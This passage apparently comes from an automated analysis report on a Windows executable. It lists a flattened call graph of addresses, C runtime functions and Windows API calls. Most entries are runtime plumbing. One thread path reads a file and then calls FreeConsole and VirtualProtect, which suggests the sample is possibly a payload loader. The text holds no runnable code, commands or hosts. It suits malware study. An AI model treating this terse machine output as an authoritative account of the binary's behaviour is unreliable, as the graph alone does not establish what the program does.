8963 c66d13 _unexpected 2 API calls 8962->8963 8963->8962 8965 c6a2bf 41 API calls 8964->8965 8966 c6a0da 8965->8966 8967 c6a117 IsValidCodePage 8966->8967 8973 c6a1df 8966->8973 8974 c6a132 std::_Xinvalid_argument 8966->8974 8970 c6a129 8967->8970 8967->8973 8968 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8969 c6a2bd 8968->8969 8969->8635 8969->8640 8971 c6a152 GetCPInfo 8970->8971 8970->8974 8971->8973 8971->8974 8973->8968 9023 c6a649 8974->9023 8976 c6a7fa ___scrt_is_nonwritable_in_current_image 8975->8976 9103 c696f8 EnterCriticalSection 8976->9103 8978 c6a804 9104 c6a588 8978->9104 8984 c6a056 8983->8984 8990 c6a04f 8983->8990 8985 c69787 _unexpected 39 API calls 8984->8985 8984->8990 8986 c6a077 8985->8986 8991 c6d714 8986->8991 8990->8953 8990->8954 8992 c6d727 8991->8992 8993 c6a08d 8991->8993 8992->8993 8999 c6b8e9 8992->8999 8995 c6d741 8993->8995 8996 c6d754 8995->8996 8997 c6d769 8995->8997 8996->8997 9020 c69fdd 8996->9020 8997->8990 9000 c6b8f5 ___scrt_is_nonwritable_in_current_image 8999->9000 9001 c69787 _unexpected 39 API calls 9000->9001 9002 c6b8fe 9001->9002 9009 c6b944 9002->9009 9012 c696f8 EnterCriticalSection 9002->9012 9004 c6b91c 9013 c6b96a 9004->9013 9009->8993 9010 c67da6 CallUnexpected 39 API calls 9011 c6b969 9010->9011 9012->9004 9014 c6b978 __strnicoll 9013->9014 9016 c6b92d 9013->9016 9015 c6b71e __strnicoll 14 API calls 9014->9015 9014->9016 9015->9016 9017 c6b949 9016->9017 9018 c6970f CallUnexpected LeaveCriticalSection 9017->9018 9019 c6b940 9018->9019 9019->9009 9019->9010 9021 c69787 _unexpected 39 API calls 9020->9021 9022 c69fe2 9021->9022 9022->8997 9024 c6a671 GetCPInfo 9023->9024 9025 c6a73a 9023->9025 9024->9025 9031 c6a689 9024->9031 9027 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9025->9027 9029 c6a7ec 9027->9029 9029->8973 9034 c6b45d 9031->9034 9033 c6d4dc 44 API calls 9033->9025 9035 c6a038 __strnicoll 39 API calls 9034->9035 9036 c6b47d 9035->9036 9054 c6b55e 9036->9054 9038 c6b539 9041 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9038->9041 9039 c6b531 9057 c6b43d 9039->9057 9040 c6b4aa 9040->9038 9040->9039 9043 c6b3b5 __strnicoll 15 API calls 9040->9043 9045 c6b4cf std::_Xinvalid_argument __alloca_probe_16 9040->9045 9044 c6a6f1 9041->9044 9043->9045 9049 c6d4dc 9044->9049 9045->9039 9046 c6b55e __strnicoll MultiByteToWideChar 9045->9046 9047 c6b518 9046->9047 9047->9039 9048 c6b51f GetStringTypeW 9047->9048 9048->9039 9050 c6a038 __strnicoll 39 API calls 9049->9050 9051 c6d4ef 9050->9051 9063 c6d525 9051->9063 9061 c6b588 9054->9061 9058 c6b45a 9057->9058 9059 c6b449 9057->9059 9058->9038 9059->9058 9060 c6a83b __freea 14 API calls 9059->9060 9060->9058 9062 c6b57a MultiByteToWideChar 9061->9062 9062->9040 9064 c6d540 __strnicoll 9063->9064 9065 c6b55e __strnicoll MultiByteToWideChar 9064->9065 9069 c6d584 9065->9069 9066 c6d6ff 9067 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9066->9067 9068 c6a712 9067->9068 9068->9033 9069->9066 9070 c6b3b5 __strnicoll 15 API calls 9069->9070 9072 c6d5aa __alloca_probe_16 9069->9072 9083 c6d652 9069->9083 9070->9072 9071 c6b43d __freea 14 API calls 9071->9066 9073 c6b55e __strnicoll MultiByteToWideChar 9072->9073 9072->9083 9074 c6d5f3 9073->9074 9074->9083 9091 c69357 9074->9091 9077 c6d661 9079 c6d6ea 9077->9079 9080 c6b3b5 __strnicoll 15 API calls 9077->9080 9084 c6d673 __alloca_probe_16 9077->9084 9078 c6d629 9082 c69357 7 API calls 9078->9082 9078->9083 9081 c6b43d __freea 14 API calls 9079->9081 9080->9084 9081->9083 9082->9083 9083->9071 9084->9079 9085 c69357 7 API calls 9084->9085 9086 c6d6b6 9085->9086 9086->9079 9100 c6c8a1 9086->9100 9088 c6d6d0 9088->9079 9089 c6d6d9 9088->9089 9090 c6b43d __freea 14 API calls 9089->9090 9090->9083 9092 c69652 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9091->9092 9093 c69362 9092->9093 9094 c6938f 9093->9094 9095 c69368 LCMapStringEx 9093->9095 9096 c693b4 __strnicoll 5 API calls 9094->9096 9099 c693af 9095->9099 9098 c693a8 LCMapStringW 9096->9098 9098->9099 9099->9077 9099->9078 9099->9083 9101 c6c8b4 ___scrt_uninitialize_crt 9100->9101 9102 c6c8f2 WideCharToMultiByte 9101->9102 9102->9088 9103->8978 9114 c69f5c 9104->9114 9106 c6a5aa 9107 c69f5c 39 API calls 9106->9107 9108 c6a5c9 9107->9108 9109 c6a5f0 9108->9109 9110 c6a83b __freea 14 API calls 9108->9110 9111 c6a82f 9109->9111 9110->9109 9128 c6970f LeaveCriticalSection 9111->9128 9113 c6a81d 9113->8641 9115 c69f6d 9114->9115 9124 c69f69 std::_Throw_Cpp_error 9114->9124 9116 c69f74 9115->9116 9119 c69f87 std::_Xinvalid_argument 9115->9119 9117 c6aec7 __strnicoll 14 API calls 9116->9117 9118 c69f79 9117->9118 9120 c6786b __strnicoll 39 API calls 9118->9120 9121 c69fb5 9119->9121 9122 c69fbe 9119->9122 9119->9124 9120->9124 9123 c6aec7 __strnicoll 14 API calls 9121->9123 9122->9124 9126 c6aec7 __strnicoll 14 API calls 9122->9126 9125 c69fba 9123->9125 9124->9106 9127 c6786b __strnicoll 39 API calls 9125->9127 9126->9125 9127->9124 9128->9113 9130 c68dca 9129->9130 9131 c68dd8 9129->9131 9130->9131 9136 c68df0 9130->9136 9132 c6aec7 __strnicoll 14 API calls 9131->9132 9133 c68de0 9132->9133 9135 c6786b __strnicoll 39 API calls 9133->9135 9134 c68dea 9134->8589 9135->9134 9136->9134 9137 c6aec7 __strnicoll 14 API calls 9136->9137 9137->9133 9139 c6767c 9138->9139 9140 c6765f 9138->9140 9139->8590 9141 c67676 9140->9141 9143 c6a83b __freea 14 API calls 9140->9143 9142 c6a83b __freea 14 API calls 9141->9142 9142->9139 9143->9140 9145 c678a4 9144->9145 9146 c678cc CallUnexpected 8 API calls 9145->9146 9147 c678b9 GetCurrentProcess TerminateProcess 9146->9147 9147->8596 9149 c6ca7f 9148->9149 9150 c6ca90 9149->9150 9154 c6caa3 ___from_strstr_to_strchr 9149->9154 9151 c6aec7 __strnicoll 14 API calls 9150->9151 9152 c6ca95 9151->9152 9152->8541 9153 c6ccba 9155 c6aec7 __strnicoll 14 API calls 9153->9155 9154->9153 9156 c6cac3 9154->9156 9157 c6ccbf 9155->9157 9211 c6ccdf 9156->9211 9160 c6a83b __freea 14 API calls 9157->9160 9160->9152 9161 c6cb09 9162 c6caf3 9161->9162 9165 c6af77 _unexpected 14 API calls 9161->9165 9168 c6a83b __freea 14 API calls 9162->9168 9163 c6cae5 9170 c6cb02 9163->9170 9171 c6caee 9163->9171 9167 c6cb17 9165->9167 9169 c6a83b __freea 14 API calls 9167->9169 9168->9152 9174 c6cb22 9169->9174 9176 c6ccdf 39 API calls 9170->9176 9175 c6aec7 __strnicoll 14 API calls 9171->9175 9172 c6cb7c 9173 c6a83b __freea 14 API calls 9172->9173 9177 c6cb84 9173->9177 9174->9162 9181 c6af77 _unexpected 14 API calls 9174->9181 9190 c6cb07 9174->9190 9175->9162 9176->9190 9186 c6cbb1 9177->9186 9219 c6c834 9177->9219 9178 c6cbc7 9178->9162 9179 c6c834 42 API calls 9178->9179 9180 c6cbf5 9179->9180 9182 c6a83b __freea 14 API calls 9180->9182 9183 c6cb3e 9181->9183 9182->9186 9188 c6a83b __freea 14 API calls 9183->9188 9184 c6ccaf 9185 c6a83b __freea 14 API calls 9184->9185 9185->9152 9186->9162 9186->9184 9192 c6af77 _unexpected 14 API calls 9186->9192 9188->9190 9189 c6cba8 9191 c6a83b __freea 14 API calls 9189->9191 9190->9162 9215 c6ccf9 9190->9215 9191->9186 9193 c6cc40 9192->9193 9194 c6cc50 9193->9194 9195 c6cc48 9193->9195 9196 c68dbc ___std_exception_copy 39 API calls 9194->9196 9197 c6a83b __freea 14 API calls 9195->9197 9198 c6cc5c 9196->9198 9197->9162 9199 c6ccd4 9198->9199 9200 c6cc63 9198->9200 9202 c67898 __strnicoll 11 API calls 9199->9202 9228 c6f07c 9200->9228 9204 c6ccde 9202->9204 9205 c6cc8a 9207 c6aec7 __strnicoll 14 API calls 9205->9207 9206 c6cca9 9208 c6a83b __freea 14 API calls 9206->9208 9209 c6cc8f 9207->9209 9208->9184 9210 c6a83b __freea 14 API calls 9209->9210 9210->9162 9212 c6ccec 9211->9212 9213 c6cace 9211->9213 9243 c6cd4e 9212->9243 9213->9161 9213->9163 9213->9190 9216 c6cb6c 9215->9216 9218 c6cd0f 9215->9218 9216->9172 9216->9178 9218->9216 9258 c6ef8b 9218->9258 9220 c6c841 9219->9220 9221 c6c85c 9219->9221 9220->9221 9222 c6c84d 9220->9222 9223 c6c86b 9221->9223 9358 c6edb8 9221->9358 9224 c6aec7 __strnicoll 14 API calls 9222->9224 9365 c6edeb 9223->9365 9227 c6c852 std::_Xinvalid_argument 9224->9227 9227->9189 9377 c6b9e4 9228->9377 9233 c6f0ef 9234 c6f0fb 9233->9234 9236 c6a83b __freea 14 API calls 9233->9236 9238 c6a83b __freea 14 API calls 9234->9238 9240 c6cc84 9234->9240 9235 c6b9e4 39 API calls 9237 c6f0cc 9235->9237 9236->9234 9239 c6ba7c 17 API calls 9237->9239 9238->9240 9241 c6f0d9 9239->9241 9240->9205 9240->9206 9241->9233 9242 c6f0e3 SetEnvironmentVariableW 9241->9242 9242->9233 9244 c6cd61 9243->9244 9251 c6cd5c 9243->9251 9245 c6af77 _unexpected 14 API calls 9244->9245 9255 c6cd7e 9245->9255 9246 c6cdec 9247 c67da6 CallUnexpected 39 API calls 9246->9247 9249 c6cdf1 9247->9249 9248 c6a83b __freea 14 API calls 9248->9251 9250 c67898 __strnicoll 11 API calls 9249->9250 9252 c6cdfd 9250->9252 9251->9213 9253 c6af77 _unexpected 14 API calls 9253->9255 9254 c6a83b __freea 14 API calls 9254->9255 9255->9246 9255->9249 9255->9253 9255->9254 9256 c68dbc ___std_exception_copy 39 API calls 9255->9256 9257 c6cddb 9255->9257 9256->9255 9257->9248 9259 c6ef9f 9258->9259 9260 c6ef99 9258->9260 9276 c6efb4 9259->9276 9263 c6f751 9260->9263 9264 c6f709 9260->9264 9296 c6f767 9263->9296 9265 c6f70f 9264->9265 9268 c6f72c 9264->9268 9267 c6aec7 __strnicoll 14 API calls 9265->9267 9270 c6f714 9267->9270 9272 c6aec7 __strnicoll 14 API calls 9268->9272 9275 c6f74a 9268->9275 9269 c6f71f 9269->9218 9271 c6786b __strnicoll 39 API calls 9270->9271 9271->9269 9273 c6f73b 9272->9273 9274 c6786b __strnicoll 39 API calls 9273->9274 9274->9269 9275->9218 9277 c6a038 __strnicoll 39 API calls 9276->9277 9278 c6efca 9277->9278 9279 c6efe6 9278->9279 9280 c6effd 9278->9280 9291 c6efaf 9278->9291 9281 c6aec7 __strnicoll 14 API calls 9279->9281 9283 c6f006 9280->9283 9284 c6f018 9280->9284 9282 c6efeb 9281->9282 9285 c6786b __strnicoll 39 API calls 9282->9285 9286 c6aec7 __strnicoll 14 API calls 9283->9286 9287 c6f025 9284->9287 9288 c6f038 9284->9288 9285->9291 9292 c6f00b 9286->9292 9289 c6f767 __strnicoll 39 API calls 9287->9289 9314 c6f832 9288->9314 9289->9291 9291->9218 9294 c6786b __strnicoll 39 API calls 9292->9294 9294->9291 9295 c6aec7 __strnicoll 14 API calls 9295->9291 9297 c6f777 9296->9297 9298 c6f791 9296->9298 9299 c6aec7 __strnicoll 14 API calls 9297->9299 9300 c6f7b0 9298->9300 9301 c6f799 9298->9301 9304 c6f77c 9299->9304 9302 c6f7d3 9300->9302 9303 c6f7bc 9300->9303 9305 c6aec7 __strnicoll 14 API calls 9301->9305 9311 c6a038 __strnicoll 39 API calls 9302->9311 9313 c6f787 9302->9313 9307 c6aec7 __strnicoll 14 API calls 9303->9307 9308 c6786b __strnicoll 39 API calls 9304->9308 9306 c6f79e 9305->9306 9309 c6786b __strnicoll 39 API calls 9306->9309 9310 c6f7c1 9307->9310 9308->9313 9309->9313 9312 c6786b __strnicoll 39 API calls 9310->9312 9311->9313 9312->9313 9313->9269 9315 c6a038 __strnicoll 39 API calls 9314->9315 9316 c6f845 9315->9316 9319 c6f878 9316->9319 9322 c6f8ac __strnicoll 9319->9322 9320 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9321 c6f04e 9320->9321 9321->9291 9321->9295 9323 c6f92c 9322->9323 9324 c6fb10 9322->9324 9326 c6f919 GetCPInfo 9322->9326 9332 c6f930 9322->9332 9325 c6b55e __strnicoll MultiByteToWideChar 9323->9325 9323->9332 9327 c6f9b2 9325->9327 9326->9323 9326->9332 9328 c6fb04 9327->9328 9329 c6b3b5 __strnicoll 15 API calls 9327->9329 9331 c6f9d9 __alloca_probe_16 9327->9331 9327->9332 9330 c6b43d __freea 14 API calls 9328->9330 9329->9331 9330->9332 9331->9328 9333 c6b55e __strnicoll MultiByteToWideChar 9331->9333 9332->9320 9332->9324 9334 c6fa25 9333->9334 9334->9328 9335 c6b55e __strnicoll MultiByteToWideChar 9334->9335 9336 c6fa41 9335->9336 9336->9328 9337 c6fa4f 9336->9337 9338 c6fab2 9337->9338 9339 c6b3b5 __strnicoll 15 API calls 9337->9339 9342 c6fa68 __alloca_probe_16 9337->9342 9340 c6b43d __freea 14 API calls 9338->9340 9339->9342 9341 c6fab8 9340->9341 9343 c6b43d __freea 14 API calls 9341->9343 9342->9338 9344 c6b55e __strnicoll MultiByteToWideChar 9342->9344 9343->9332 9345 c6faab 9344->9345 9345->9338 9346 c6fad4 9345->9346 9352 c691b0 9346->9352 9349 c6b43d __freea 14 API calls 9350 c6faf4 9349->9350 9351 c6b43d __freea 14 API calls 9350->9351 9351->9332 9353 c69638 __strnicoll 5 API calls 9352->9353 9354 c691bb 9353->9354 9355 c693b4 __strnicoll 5 API calls 9354->9355 9356 c691c1 9354->9356 9357 c69201 CompareStringW 9355->9357 9356->9349 9357->9356 9359 c6edc3 9358->9359 9360 c6edd8 HeapSize 9358->9360 9361 c6aec7 __strnicoll 14 API calls 9359->9361 9360->9223 9362 c6edc8 9361->9362 9363 c6786b __strnicoll 39 API calls 9362->9363 9364 c6edd3 9363->9364 9364->9223 9366 c6ee03 9365->9366 9367 c6edf8 9365->9367 9368 c6ee0b 9366->9368 9375 c6ee14 _unexpected 9366->9375 9369 c6b3b5 __strnicoll 15 API calls 9367->9369 9370 c6a83b __freea 14 API calls 9368->9370 9373 c6ee00 9369->9373 9370->9373 9371 c6ee3e HeapReAlloc 9371->9373 9371->9375 9372 c6ee19 9374 c6aec7 __strnicoll 14 API calls 9372->9374 9373->9227 9374->9373 9375->9371 9375->9372 9376 c66d13 _unexpected 2 API calls 9375->9376 9376->9375 9378 c6a038 __strnicoll 39 API calls 9377->9378 9379 c6b9f6 9378->9379 9380 c6ba08 9379->9380 9385 c69191 9379->9385 9382 c6ba7c 9380->9382 9391 c6bc52 9382->9391 9388 c6961e 9385->9388 9389 c69599 _unexpected 5 API calls 9388->9389 9390 c69199 9389->9390 9390->9380 9392 c6bc60 9391->9392 9393 c6bc7a 9391->9393 9409 c6ba62 9392->9409 9395 c6bca0 9393->9395 9396 c6bc81 9393->9396 9397 c6b55e __strnicoll MultiByteToWideChar 9395->9397 9408 c6ba94 9396->9408 9413 c6ba23 9396->9413 9398 c6bcaf 9397->9398 9400 c6bcb6 GetLastError 9398->9400 9402 c6bcdc 9398->9402 9404 c6ba23 15 API calls 9398->9404 9418 c6aeed 9400->9418 9405 c6b55e __strnicoll MultiByteToWideChar 9402->9405 9402->9408 9404->9402 9407 c6bcf3 9405->9407 9406 c6aec7 __strnicoll 14 API calls 9406->9408 9407->9400 9407->9408 9408->9233 9408->9235 9410 c6ba6d 9409->9410 9411 c6ba75 9409->9411 9412 c6a83b __freea 14 API calls 9410->9412 9411->9408 9412->9411 9414 c6ba62 14 API calls 9413->9414 9415 c6ba31 9414->9415 9423 c6b9c5 9415->9423 9426 c6aeda 9418->9426 9420 c6aef8 __dosmaperr 9421 c6aec7 __strnicoll 14 API calls 9420->9421 9422 c6af0b 9421->9422 9422->9406 9424 c6b3b5 __strnicoll 15 API calls 9423->9424 9425 c6b9d2 9424->9425 9425->9408 9427 c698d8 __dosmaperr 14 API calls 9426->9427 9428 c6aedf 9427->9428 9428->9420 9430 c61ca1 9429->9430 9439 c63c1a 9430->9439 9432 c61cd1 9453 c61dc0 9432->9453 9438 c61d52 9438->8400 9441 c63c1f 9439->9441 9442 c63c39 9441->9442 9443 c66d13 _unexpected 2 API calls 9441->9443 9444 c63c3b std::_Throw_Cpp_error 9441->9444 9473 c67e10 9441->9473 9442->9432 9443->9441 9445 c6449e std::_Throw_Cpp_error 9444->9445 9480 c6556e 9444->9480 9446 c6556e CallUnexpected RaiseException 9445->9446 9448 c644bb IsProcessorFeaturePresent 9446->9448 9450 c644d1 9448->9450 9483 c645b7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9450->9483 9452 c645b4 9452->9432 9484 c632d0 9453->9484 9455 c61d00 9456 c61e00 9455->9456 9457 c61e1e 9456->9457 9458 c61e32 GetCurrentThreadId 9457->9458 9459 c63e7f std::_Throw_Cpp_error 42 API calls 9457->9459 9460 c61e4d 9458->9460 9461 c61e59 9458->9461 9459->9458 9463 c63e7f std::_Throw_Cpp_error 42 API calls 9460->9463 9808 c6442d WaitForSingleObjectEx 9461->9808 9463->9461 9465 c61e98 9467 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9465->9467 9466 c63e7f std::_Throw_Cpp_error 42 API calls 9466->9465 9468 c61d2c 9467->9468 9468->9438 9469 c61ed0 9468->9469 9470 c61edf 9469->9470 9471 c61ee7 9470->9471 9814 c67eab 9470->9814 9471->9438 9478 c6b3b5 _unexpected 9473->9478 9474 c6b3f3 9475 c6aec7 __strnicoll 14 API calls 9474->9475 9477 c6b3f1 9475->9477 9476 c6b3de RtlAllocateHeap 9476->9477 9476->9478 9477->9441 9478->9474 9478->9476 9479 c66d13 _unexpected 2 API calls 9478->9479 9479->9478 9481 c655b6 RaiseException 9480->9481 9482 c65588 9480->9482 9481->9445 9482->9481 9483->9452 9494 c63400 9484->9494 9486 c63327 9501 c667f4 9486->9501 9488 c63379 9489 c63393 9488->9489 9490 c633a0 9488->9490 9516 c635c0 9489->9516 9520 c63e7f 9490->9520 9493 c6339b 9493->9455 9495 c63c1a std::_Throw_Cpp_error 21 API calls 9494->9495 9496 c63449 9495->9496 9526 c63650 9496->9526 9502 c66815 9501->9502 9503 c66801 9501->9503 9544 c66885 9502->9544 9505 c6aec7 __strnicoll 14 API calls 9503->9505 9507 c66806 9505->9507 9509 c6786b __strnicoll 39 API calls 9507->9509 9508 c6682a CreateThread 9510 c66849 GetLastError 9508->9510 9511 c66855 9508->9511 9561 c6690c 9508->9561 9512 c66811 9509->9512 9513 c6aeed __dosmaperr 14 API calls 9510->9513 9553 c668d5 9511->9553 9512->9488 9513->9511 9517 c635ec 9516->9517 9518 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9517->9518 9519 c635f9 9518->9519 9519->9493 9521 c63e95 std::_Throw_Cpp_error 9520->9521 9687 c640a7 9521->9687 9535 c63700 9526->9535 9529 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9530 c63473 9529->9530 9531 c636b0 9530->9531 9532 c636e0 9531->9532 9533 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9532->9533 9534 c6348b 9533->9534 9534->9486 9540 c63760 9535->9540 9537 c63733 9538 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9537->9538 9539 c6368c 9538->9539 9539->9529 9541 c63789 9540->9541 9542 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9541->9542 9543 c637a7 9542->9543 9543->9537 9545 c6af77 _unexpected 14 API calls 9544->9545 9546 c66896 9545->9546 9547 c6a83b __freea 14 API calls 9546->9547 9548 c668a3 9547->9548 9549 c668c7 9548->9549 9550 c668aa GetModuleHandleExW 9548->9550 9551 c668d5 16 API calls 9549->9551 9550->9549 9552 c66821 9551->9552 9552->9508 9552->9511 9554 c668e1 9553->9554 9560 c66860 9553->9560 9555 c668e7 CloseHandle 9554->9555 9556 c668f0 9554->9556 9555->9556 9557 c668f6 FreeLibrary 9556->9557 9558 c668ff 9556->9558 9557->9558 9559 c6a83b __freea 14 API calls 9558->9559 9559->9560 9560->9488 9562 c66918 ___scrt_is_nonwritable_in_current_image 9561->9562 9563 c6691f GetLastError ExitThread 9562->9563 9564 c6692c 9562->9564 9565 c69787 _unexpected 39 API calls 9564->9565 9566 c66931 9565->9566 9577 c6b0e6 9566->9577 9569 c66948 9581 c634c0 9569->9581 9571 c66964 9591 c66877 9571->9591 9578 c6693c 9577->9578 9579 c6b0f6 CallUnexpected 9577->9579 9578->9569 9588 c693e5 9578->9588 9579->9578 9594 c6948e 9579->9594 9582 c636b0 5 API calls 9581->9582 9583 c63502 std::_Throw_Cpp_error 9582->9583 9597 c63820 9583->9597 9587 c63552 9587->9571 9589 c69599 _unexpected 5 API calls 9588->9589 9590 c69401 9589->9590 9590->9569 9675 c6698a 9591->9675 9595 c69599 _unexpected 5 API calls 9594->9595 9596 c694aa 9595->9596 9596->9578 9608 c61930 9597->9608 9600 c6432f GetCurrentThreadId 9662 c643f0 9600->9662 9602 c643d0 9603 c646d7 ReleaseSRWLockExclusive 9602->9603 9604 c643da 9603->9604 9604->9587 9605 c6436c 9605->9602 9668 c646d7 9605->9668 9671 c64822 WakeAllConditionVariable 9605->9671 9628 c61770 GetPEB 9608->9628 9610 c61971 9629 c611d0 9610->9629 9613 c619f0 GetFileSize 9614 c61a17 CloseHandle 9613->9614 9618 c61a30 9613->9618 9616 c619e6 9614->9616 9615 c61aec 9615->9600 9616->9615 9617 c61bc8 9616->9617 9650 c61360 9616->9650 9654 c61000 9616->9654 9658 c61430 9616->9658 9635 c617e0 9617->9635 9621 c61a4a ReadFile 9618->9621 9622 c61a8c 9621->9622 9623 c61acd CloseHandle 9621->9623 9624 c61ab4 CloseHandle 9622->9624 9626 c61a9e 9622->9626 9623->9616 9624->9616 9626->9624 9628->9610 9633 c61251 9629->9633 9630 c61303 CreateFileA 9630->9613 9630->9616 9631 c61360 std::_Throw_Cpp_error 42 API calls 9631->9633 9632 c61000 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9632->9633 9633->9630 9633->9631 9633->9632 9634 c61430 39 API calls 9633->9634 9634->9633 9636 c611d0 42 API calls 9635->9636 9637 c61843 FreeConsole 9636->9637 9638 c614a0 20 API calls 9637->9638 9639 c61870 9638->9639 9640 c614a0 20 API calls 9639->9640 9641 c618aa 9640->9641 9642 c611d0 42 API calls 9641->9642 9643 c618bf VirtualProtect 9642->9643 9645 c61906 9643->9645 9646 c61911 9643->9646 9648 c617a0 ExitProcess 9645->9648 9647 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9646->9647 9649 c61920 9647->9649 9648->9646 9649->9615 9651 c613a8 std::_Throw_Cpp_error 9650->9651 9652 c63120 std::_Throw_Cpp_error 42 API calls 9651->9652 9653 c613e3 9652->9653 9653->9616 9656 c61032 9654->9656 9655 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9657 c6117a 9655->9657 9656->9655 9657->9616 9659 c6146a 9658->9659 9660 c62f00 std::_Throw_Cpp_error 39 API calls 9659->9660 9661 c61473 9660->9661 9661->9616 9672 c646c6 9662->9672 9664 c643f9 9665 c63e7f std::_Throw_Cpp_error 42 API calls 9664->9665 9667 c6440d 9664->9667 9666 c64416 9665->9666 9667->9605 9669 c646e4 ReleaseSRWLockExclusive 9668->9669 9670 c646f2 9668->9670 9669->9670 9670->9605 9671->9605 9673 c646f6 12 API calls 9672->9673 9674 c646d3 9673->9674 9674->9664 9676 c698d8 __dosmaperr 14 API calls 9675->9676 9679 c66995 9676->9679 9677 c669d7 ExitThread 9678 c669ae 9681 c669c1 9678->9681 9682 c669ba CloseHandle 9678->9682 9679->9677 9679->9678 9684 c69420 9679->9684 9681->9677 9683 c669cd FreeLibraryAndExitThread 9681->9683 9682->9681 9683->9677 9685 c69599 _unexpected 5 API calls 9684->9685 9686 c69439 9685->9686 9686->9678 9688 c640b3 __EH_prolog3_GS 9687->9688 9689 c61360 std::_Throw_Cpp_error 42 API calls 9688->9689 9690 c640c7 9689->9690 9697 c63fe4 9690->9697 9717 c63d75 9697->9717 9704 c62f00 std::_Throw_Cpp_error 39 API calls 9705 c6402d 9704->9705 9706 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9705->9706 9707 c6404c 9706->9707 9708 c62f00 9707->9708 9709 c62f24 std::_Throw_Cpp_error 9708->9709 9711 c62f34 std::_Throw_Cpp_error 9709->9711 9796 c62fd0 9709->9796 9712 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9711->9712 9713 c62f9e 9712->9713 9714 c646b7 9713->9714 9715 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9714->9715 9716 c646c1 9715->9716 9716->9716 9718 c63d98 9717->9718 9739 c64160 9718->9739 9720 c63da3 9721 c63f71 9720->9721 9722 c63f7d __EH_prolog3_GS 9721->9722 9724 c63f9c std::_Throw_Cpp_error 9722->9724 9762 c63dab 9722->9762 9725 c63dab std::_Throw_Cpp_error 42 API calls 9724->9725 9726 c63fc1 9725->9726 9727 c62f00 std::_Throw_Cpp_error 39 API calls 9726->9727 9728 c63fc9 9727->9728 9766 c61f40 9728->9766 9731 c62f00 std::_Throw_Cpp_error 39 API calls 9732 c63fdc 9731->9732 9733 c646b7 std::_Throw_Cpp_error 5 API calls 9732->9733 9734 c63fe3 9733->9734 9735 c63e0f 9734->9735 9736 c63e22 9735->9736 9785 c63c9c 9736->9785 9740 c64173 9739->9740 9741 c641cc 9739->9741 9746 c6417d std::_Throw_Cpp_error 9740->9746 9748 c62d10 9740->9748 9759 c62c90 9741->9759 9746->9720 9749 c62d3e std::_Throw_Cpp_error 9748->9749 9750 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9749->9750 9751 c62d9d 9750->9751 9752 c62360 9751->9752 9753 c62373 9752->9753 9754 c6237f 9752->9754 9753->9746 9755 c6239f 9754->9755 9756 c6238c 9754->9756 9758 c62430 std::_Throw_Cpp_error 21 API calls 9755->9758 9757 c623c0 std::_Throw_Cpp_error 42 API calls 9756->9757 9757->9753 9758->9753 9760 c642ba std::_Xinvalid_argument 41 API calls 9759->9760 9761 c62ca2 9760->9761 9763 c63dfa 9762->9763 9765 c63dc5 std::_Throw_Cpp_error 9762->9765 9770 c641d2 9763->9770 9765->9724 9767 c61f82 std::_Throw_Cpp_error 9766->9767 9781 c62090 9767->9781 9771 c641f6 9770->9771 9772 c6429c 9770->9772 9773 c62d10 std::_Throw_Cpp_error 5 API calls 9771->9773 9774 c62c90 std::_Throw_Cpp_error 41 API calls 9772->9774 9776 c64208 9773->9776 9775 c642a1 9774->9775 9777 c62360 std::_Throw_Cpp_error 42 API calls 9776->9777 9778 c64213 std::_Throw_Cpp_error 9777->9778 9779 c64267 std::_Throw_Cpp_error 9778->9779 9780 c62b30 std::_Throw_Cpp_error 39 API calls 9778->9780 9779->9765 9780->9779 9782 c620d5 std::_Throw_Cpp_error 9781->9782 9783 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9782->9783 9784 c61fc1 9783->9784 9784->9731 9788 c65b4b 9785->9788 9789 c63cc8 9788->9789 9790 c65b58 9788->9790 9789->9704 9790->9789 9791 c67e10 ___std_exception_copy 15 API calls 9790->9791 9792 c65b75 9791->9792 9793 c65b85 9792->9793 9794 c68dbc ___std_exception_copy 39 API calls 9792->9794 9795 c67df5 ___std_exception_destroy 14 API calls 9793->9795 9794->9793 9795->9789 9799 c63020 9796->9799 9802 c62b30 9799->9802 9803 c62b65 std::_Throw_Cpp_error 9802->9803 9804 c62b53 9802->9804 9806 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9803->9806 9805 c62b90 std::_Throw_Cpp_error 39 API calls 9804->9805 9805->9803 9807 c62b81 9806->9807 9807->9711 9809 c61e83 9808->9809 9810 c64444 9808->9810 9809->9465 9809->9466 9811 c64461 CloseHandle 9810->9811 9812 c6444b GetExitCodeThread 9810->9812 9811->9809 9812->9809 9813 c6445c 9812->9813 9813->9811 9815 c67eb7 ___scrt_is_nonwritable_in_current_image 9814->9815 9816 c69787 _unexpected 39 API calls 9815->9816 9819 c67ebc 9816->9819 9817 c67da6 